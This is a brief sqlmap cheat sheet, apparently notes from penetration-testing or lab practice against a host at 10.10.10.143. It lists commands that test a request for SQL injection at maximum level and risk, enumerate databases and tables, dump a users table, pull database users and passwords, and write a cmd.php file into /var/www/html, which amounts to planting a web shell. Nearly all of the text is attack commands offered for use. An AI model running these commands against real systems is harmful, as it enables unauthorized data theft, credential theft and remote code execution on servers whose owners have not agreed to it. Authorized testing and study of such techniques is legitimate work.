SQL Injection

SQL Injection with req.txt

sqlmap -r req.txt -p [TESTPARAMENTER] --level 5 --risk 3

• for default

sqlmap -r req.txt --batch

• If you know which dbms is there

sqlmap -r sqli.txt --dbms=mysql

• If you want to know which databases are there

sqlmap -r sqli.txt --dbms=mysql --dbs 

• If you want to know tables in a database

sqlmap -r sqli.txt --dbms=mysql -D status --tables

• If you want to dump table data

sqlmap -r sqli.txt --dbms=mysql --dump -T users

SQL Inject with URL

sqlmap -u http://10.10.10.143/room.php?cod=1 

• If you want to retrieve users and passwords

sqlmap -u http://10.10.10.143/room.php?cod=1 --users --passwords 

• If you want to upload a file

sqlmap -u http://10.10.10.143/room.php?cod=1 --file-write cmd.php --file-dest /var/www/html/cmd.php